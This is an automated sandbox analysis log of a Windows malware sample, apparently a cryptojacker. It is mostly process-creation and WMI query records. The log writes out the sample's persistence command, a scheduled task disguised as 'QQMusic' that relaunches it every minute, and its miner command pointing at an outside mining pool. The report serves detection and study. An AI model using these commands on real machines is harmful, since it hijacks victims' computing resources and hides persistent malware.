Source: C:\Windows\SysWOW64\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "syabcd.exe")
Source: C:\Windows\SysWOW64\cmd.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "syabcd.exe")
Source: C:\Windows\SysWOW64\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "syabcd.exe")
Source: C:\Windows\SysWOW64\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "syabcd.exe")
Source: C:\Windows\System32\conhost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "syabcd.exe")
Source: C:\Windows\SysWOW64\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "syabcd.exe")
Source: C:\Windows\SysWOW64\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "syabcd.exe")
Source: C:\Windows\System32\conhost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "syabcd.exe")
Source: C:\Windows\SysWOW64\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "syabcd.exe")
Source: C:\Windows\System32\conhost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "syabcd.exe")
Source: C:\Windows\SysWOW64\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "syabcd.exe")
Source: C:\Windows\SysWOW64\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "syabcd.exe")
Source: C:\Windows\SysWOW64\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "syabcd.exe")
Source: C:\Windows\SysWOW64\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "syabcd.exe")
Source: C:\Windows\System32\Conhost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "syabcd.exe")
Source: C:\Windows\System32\Conhost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "syabcd.exe")
Source: C:\Windows\System32\Conhost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "syabcd.exe")
Source: C:\Windows\System32\Conhost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "syabcd.exe")
Source: C:\Windows\System32\Conhost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "syabcd.exe")
Source: C:\Windows\System32\Conhost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "syabcd.exe")
Source: C:\Windows\System32\Conhost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "syabcd.exe")
Source: C:\Windows\System32\Conhost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "syabcd.exe")
Source: C:\Windows\System32\Conhost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "syabcd.exe")
Source: C:\Windows\System32\Conhost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "syabcd.exe")
Source: C:\Windows\System32\Conhost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "syabcd.exe")
Source: C:\Windows\System32\Conhost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "syabcd.exe")
Source: C:\Windows\System32\Conhost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "syabcd.exe")
Source: C:\Windows\System32\Conhost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "syabcd.exe")
Source: C:\Windows\System32\Conhost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "syabcd.exe")
Source: C:\Windows\System32\Conhost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "syabcd.exe")
Source: C:\Windows\System32\Conhost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "syabcd.exe")
Source: C:\Windows\System32\Conhost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "syabcd.exe")

Source: C:\Users\user\Desktop\x00zm3KVwb.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: x00zm3KVwb.exe

ReversingLabs: Detection: 81%

Source: syabcd.exe	String found in binary or memory: id-cmc-addExtensions
Source: syabcd.exe	String found in binary or memory: set-addPolicy

Source: C:\Users\user\Desktop\x00zm3KVwb.exe

File read: C:\Users\user\Desktop\x00zm3KVwb.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\x00zm3KVwb.exe "C:\Users\user\Desktop\x00zm3KVwb.exe"
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c schtasks /create /sc minute /mo 1 /tn "QQMusic" /tr C:\Users\user\Desktop\x00zm3KVwb.exe /F
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c taskkill /f /im syabcd.exe&&exit
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /sc minute /mo 1 /tn "QQMusic" /tr C:\Users\user\Desktop\x00zm3KVwb.exe /F
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /f /im syabcd.exe
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c taskkill /f /im syabcd.exe&&exit
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /f /im syabcd.exe
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c taskkill /f /im syabcd.exe&&exit
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /f /im syabcd.exe
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c taskkill /f /im syabcd.exe&&exit
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /f /im syabcd.exe
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c taskkill /f /im syabcd.exe&&exit
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\Users\user\Desktop\x00zm3KVwb.exe C:\Users\user\Desktop\x00zm3KVwb.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /f /im syabcd.exe
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c taskkill /f /im syabcd.exe&&exit
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c ipconfig /flushdns
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c taskkill /f /im syabcd.exe&&exit
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /f /im syabcd.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\ipconfig.exe ipconfig /flushdns
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: C:\ProgramData\syabcd.exe C:\ProgramData\syabcd.exe -o stratum+tcp://auto.c3pool.org:19999 -u SN -p 1 --max-cpu-usage=25 --cpu-priority 1 --cpu-max-threads-hint=25 -K
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /f /im syabcd.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /f /im syabcd.exe
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c taskkill /f /im syabcd.exe&&exit
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /f /im syabcd.exe
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c taskkill /f /im syabcd.exe&&exit
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: C:\ProgramData\syabcd.exe C:\ProgramData\syabcd.exe -o stratum+tcp://auto.c3pool.org:19999 -u SN -p 1 --max-cpu-usage=25 --cpu-priority 1 --cpu-max-threads-hint=25 -K
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c taskkill /f /im syabcd.exe&&exit
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /f /im syabcd.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /f /im syabcd.exe
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c taskkill /f /im syabcd.exe&&exit
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: C:\ProgramData\syabcd.exe C:\ProgramData\syabcd.exe -o stratum+tcp://auto.c3pool.org:19999 -u SN -p 1 --max-cpu-usage=25 --cpu-priority 1 --cpu-max-threads-hint=25 -K
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /f /im syabcd.exe
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c taskkill /f /im syabcd.exe&&exit
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: C:\ProgramData\syabcd.exe C:\ProgramData\syabcd.exe -o stratum+tcp://auto.c3pool.org:19999 -u SN -p 1 --max-cpu-usage=25 --cpu-priority 1 --cpu-max-threads-hint=25 -K
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /f /im syabcd.exe
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c taskkill /f /im syabcd.exe&&exit
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /f /im syabcd.exe
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c taskkill /f /im syabcd.exe&&exit
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /f /im syabcd.exe
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: C:\ProgramData\syabcd.exe C:\ProgramData\syabcd.exe -o stratum+tcp://auto.c3pool.org:19999 -u SN -p 1 --max-cpu-usage=25 --cpu-priority 1 --cpu-max-threads-hint=25 -K
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c taskkill /f /im syabcd.exe&&exit
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /f /im syabcd.exe
Source: unknown	Process created: C:\Users\user\Desktop\x00zm3KVwb.exe C:\Users\user\Desktop\x00zm3KVwb.exe
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c taskkill /f /im syabcd.exe&&exit
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: C:\ProgramData\syabcd.exe C:\ProgramData\syabcd.exe -o stratum+tcp://auto.c3pool.org:19999 -u SN -p 1 --max-cpu-usage=25 --cpu-priority 1 --cpu-max-threads-hint=25 -K
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /f /im syabcd.exe
Source: C:\ProgramData\syabcd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c taskkill /f /im syabcd.exe&&exit
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /f /im syabcd.exe
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: C:\ProgramData\syabcd.exe C:\ProgramData\syabcd.exe -o stratum+tcp://auto.c3pool.org:19999 -u SN -p 1 --max-cpu-usage=25 --cpu-priority 1 --cpu-max-threads-hint=25 -K
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c taskkill /f /im syabcd.exe&&exit
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\ProgramData\syabcd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c taskkill /f /im syabcd.exe&&exit
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /f /im syabcd.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /f /im syabcd.exe
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c taskkill /f /im syabcd.exe&&exit
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: C:\ProgramData\syabcd.exe C:\ProgramData\syabcd.exe -o stratum+tcp://auto.c3pool.org:19999 -u SN -p 1 --max-cpu-usage=25 --cpu-priority 1 --cpu-max-threads-hint=25 -K
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /f /im syabcd.exe
Source: C:\ProgramData\syabcd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c taskkill /f /im syabcd.exe&&exit
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /f /im syabcd.exe
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c taskkill /f /im syabcd.exe&&exit
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: C:\ProgramData\syabcd.exe C:\ProgramData\syabcd.exe -o stratum+tcp://auto.c3pool.org:19999 -u SN -p 1 --max-cpu-usage=25 --cpu-priority 1 --cpu-max-threads-hint=25 -K
Source: C:\ProgramData\syabcd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /f /im syabcd.exe
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c taskkill /f /im syabcd.exe&&exit
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /f /im syabcd.exe
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c taskkill /f /im syabcd.exe&&exit
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /f /im syabcd.exe
Source: C:\ProgramData\syabcd.exe	Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\taskkill.exe	Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\conhost.exe	Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\taskkill.exe	Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\schtasks.exe	Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\conhost.exe	Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\taskkill.exe	Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\conhost.exe	Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\conhost.exe	Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\Conhost.exe	Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\taskkill.exe	Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\Conhost.exe	Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\taskkill.exe	Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\conhost.exe	Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\taskkill.exe	Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\conhost.exe	Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\Conhost.exe	Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c schtasks /create /sc minute /mo 1 /tn "QQMusic" /tr C:\Users\user\Desktop\x00zm3KVwb.exe /F	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c taskkill /f /im syabcd.exe&&exit	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c taskkill /f /im syabcd.exe&&exit	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c taskkill /f /im syabcd.exe&&exit	Jump to behavior
